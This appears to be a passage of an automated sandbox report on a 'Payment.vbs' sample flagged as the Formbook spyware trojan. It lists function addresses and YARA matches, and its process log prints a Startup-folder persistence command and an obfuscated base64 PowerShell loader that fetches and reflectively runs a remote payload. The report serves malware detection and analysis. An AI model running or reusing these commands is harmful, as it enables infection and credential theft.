Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C7A46	10_2_039C7A46
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03983A6C	10_2_03983A6C
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039129A0	10_2_039129A0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039DA9A6	10_2_039DA9A6
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03919950	10_2_03919950
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392B950	10_2_0392B950
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03926962	10_2_03926962
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_038F68B8	10_2_038F68B8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0393E8F0	10_2_0393E8F0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039138E0	10_2_039138E0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0397D800	10_2_0397D800
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03912840	10_2_03912840
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391A840	10_2_0391A840
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03911F92	10_2_03911F92
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFFB1	10_2_039CFFB1
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0398EFA0	10_2_0398EFA0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03902FC8	10_2_03902FC8
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391CFE0	10_2_0391CFE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFF09	10_2_039CFF09
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03930F30	10_2_03930F30
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03952F28	10_2_03952F28
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03984F40	10_2_03984F40
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03922E90	10_2_03922E90
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CCE93	10_2_039CCE93
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03919EB0	10_2_03919EB0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CEEDB	10_2_039CEEDB
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CEE26	10_2_039CEE26
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910E59	10_2_03910E59
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03928DBF	10_2_03928DBF
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0392FDC0	10_2_0392FDC0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0390ADE0	10_2_0390ADE0
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_0391AD00	10_2_0391AD00
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C1D5A	10_2_039C1D5A
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03913D40	10_2_03913D40
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039C7D73	10_2_039C7D73
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039B0CB5	10_2_039B0CB5
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03900CF2	10_2_03900CF2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_039CFCF2	10_2_039CFCF2
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03910C00	10_2_03910C00
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: 10_2_03989C32	10_2_03989C32
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC4393	17_2_03AC4393
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACAAAE	17_2_03ACAAAE
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03ACAAB3	17_2_03ACAAB3
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC416A	17_2_03AC416A
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC4173	17_2_03AC4173
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AE2EF3	17_2_03AE2EF3
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC25EB	17_2_03AC25EB
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 17_2_03AC2413	17_2_03AC2413
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0368D34C	19_2_0368D34C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375A352	19_2_0375A352
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375132D	19_2_0375132D
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037603E6	19_2_037603E6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036AE3F0	19_2_036AE3F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036E739A	19_2_036E739A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03740274	19_2_03740274
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037412ED	19_2_037412ED
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BB2C0	19_2_036BB2C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A52A0	19_2_036A52A0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036D516C	19_2_036D516C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0368F172	19_2_0368F172
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0376B16B	19_2_0376B16B
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03690100	19_2_03690100
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0373A118	19_2_0373A118
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037581CC	19_2_037581CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036AB1B0	19_2_036AB1B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037601AA	19_2_037601AA
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375F0E0	19_2_0375F0E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037570E9	19_2_037570E9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A70C0	19_2_036A70C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0374F0CC	19_2_0374F0CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A0770	19_2_036A0770
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036C4750	19_2_036C4750
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0369C7C0	19_2_0369C7C0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375F7B0	19_2_0375F7B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BC6E0	19_2_036BC6E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_037516CC	19_2_037516CC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03757571	19_2_03757571
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A0535	19_2_036A0535
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0373D5B0	19_2_0373D5B0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03760591	19_2_03760591
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03691460	19_2_03691460
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03752446	19_2_03752446
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375F43F	19_2_0375F43F
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0374E4F6	19_2_0374E4F6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FB76	19_2_0375FB76
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375AB40	19_2_0375AB40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036DDBF9	19_2_036DDBF9
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03756BD7	19_2_03756BD7
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BFB80	19_2_036BFB80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03713A6C	19_2_03713A6C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03757A46	19_2_03757A46
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FA49	19_2_0375FA49
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0374DAC6	19_2_0374DAC6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036E5AA0	19_2_036E5AA0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0373DAAC	19_2_0373DAAC
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0369EA80	19_2_0369EA80
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036B6962	19_2_036B6962
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A9950	19_2_036A9950
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BB950	19_2_036BB950
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A29A0	19_2_036A29A0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0376A9A6	19_2_0376A9A6
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A2840	19_2_036A2840
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036AA840	19_2_036AA840
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0370D800	19_2_0370D800
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A38E0	19_2_036A38E0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036CE8F0	19_2_036CE8F0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036868B8	19_2_036868B8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03714F40	19_2_03714F40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036E2F28	19_2_036E2F28
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036C0F30	19_2_036C0F30
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FF09	19_2_0375FF09
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036ACFE0	19_2_036ACFE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03692FC8	19_2_03692FC8
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FFB1	19_2_0375FFB1
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A1F92	19_2_036A1F92
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A0E59	19_2_036A0E59
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375EE26	19_2_0375EE26
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375EEDB	19_2_0375EEDB
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A9EB0	19_2_036A9EB0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375CE93	19_2_0375CE93
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036B2E90	19_2_036B2E90
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03757D73	19_2_03757D73
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A3D40	19_2_036A3D40
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03751D5A	19_2_03751D5A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036AAD00	19_2_036AAD00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0369ADE0	19_2_0369ADE0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036BFDC0	19_2_036BFDC0
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036B8DBF	19_2_036B8DBF
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03719C32	19_2_03719C32
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_036A0C00	19_2_036A0C00
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0375FCF2	19_2_0375FCF2
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03690CF2	19_2_03690CF2
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03740CB5	19_2_03740CB5
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356F02A	19_2_0356F02A
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356E358	19_2_0356E358
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356CB18	19_2_0356CB18
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_03575304	19_2_03575304
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356CA7C	19_2_0356CA7C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356D878	19_2_0356D878
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356E80C	19_2_0356E80C
Source: C:\Windows\SysWOW64\convert.exe	Code function: 19_2_0356E473	19_2_0356E473
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A1E44D	24_2_04A1E44D
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A3ED55	24_2_04A3ED55
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A1FFCC	24_2_04A1FFCC
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A1FFD5	24_2_04A1FFD5
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A28735	24_2_04A28735
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A25085	24_2_04A25085
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A201F5	24_2_04A201F5
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A26910	24_2_04A26910
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A26915	24_2_04A26915
Source: C:\Program Files (x86)\eOzLOCLFzIjDwxUAupKFqaMuNUkECYDhsxWHgpZJjczOduhxqpSFlANYMiqNahFLJmLTxn\mNqSPruzCXM.exe	Code function: 24_2_04A1E275	24_2_04A1E275

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 036D5130 appears 36 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0371F290 appears 105 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0368B970 appears 266 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 036E7E54 appears 89 times
Source: C:\Windows\SysWOW64\convert.exe	Code function: String function: 0370EA12 appears 84 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 03945130 appears 36 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 0397EA12 appears 86 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 03957E54 appears 96 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 0398F290 appears 105 times
Source: C:\Windows\SysWOW64\appidtel.exe	Code function: String function: 038FB970 appears 268 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: Payment.vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: 10.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.3538540839.00000000049D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2728680734.0000000004690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2728578874.0000000003C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2976888806.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2727369839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.3536826392.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.2976926414.0000000003440000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2436, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3768, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@20/12@3/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4436:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aftf20og.0ld.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: convert.exe, 00000013.00000002.2974673632.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000002.2974673632.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2912164452.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 00000013.00000003.2914622076.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Payment.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.emariehnip.vbs')')
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SWV4ICgoKCdoJysnUmZ1JysncmwgPSBoM2todHRwczonKycvLycrJ3JhJysndy4nKydnaXRodScrJ2J1Jysnc2VyJysnY29udGVuJysndC5jb20nKycvTm8nKydEZXRlY3RPJysnbi9Ob0RldGVjdE9uL3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtJysnVi50eHRoM2s7IGhSJysnZmInKydhc2U2NCcrJ0NvbnRlbnQgPScrJyAoTmUnKyd3LU9iamVjdCBTeXN0ZScrJ20uTicrJ2V0LldlYicrJ0NsaWVudCkuRG93bmxvYWRTdHInKydpbmcnKycoaFInKydmdXJsKTsgaFInKydmYmluYXInKyd5QycrJ29udGVudCA9IFtTJysneScrJ3N0ZW0uQ29udmVyJysndF06JysnOkZyb21CYScrJ3MnKydlNjRTdHInKydpbmcoaCcrJ1JmYicrJ2EnKydzJysnZTY0Q28nKydudGVudCcrJyknKyc7IGgnKydSZmEnKydzcycrJ2VtYmx5ID0gW1JlZmxlJysnY3Rpb24nKycuQXNzZW1ibHknKyddOjpMb2FkKGhSZmJpbmFyeUNvbnRlbnQpOyBbZCcrJ25saWInKycuSU8uSG9tZV06OlZBSSgnKydDdXQwL08nKycxRktTL2QvZWUuZXRzYXAnKycvLzpzcHR0aCcrJ0N1dCwgQ3UnKyd0ZCcrJ2VzYXRpdmFkb0N1dCwnKycgJysnQ3UnKyd0ZGVzYXRpdmFkb0N1dCwgJysnQ3V0ZGUnKydzYXRpdmFkb0N1dCwgQ3V0ZCcrJ2VzJysnYXQnKydpdmEnKydkbycrJ0N1dCwnKycgQycrJ3V0MUMnKyd1dCwgQ3V0YXBwaWR0ZWxDdXQpJykgIC1jUkVwbEFjRSdDdXQnLFtjSEFSXTM0ICAtUkVwTEFDZSAgKFtjSEFSXTEwNCtbY0hBUl04MitbY0hBUl0xMDIpLFtjSEFSXTM2ICAtUkVwTEFDZShbY0hBUl0xMDQrW2NIQVJdNTErW2NIQVJdMTA3KSxbY0hBUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
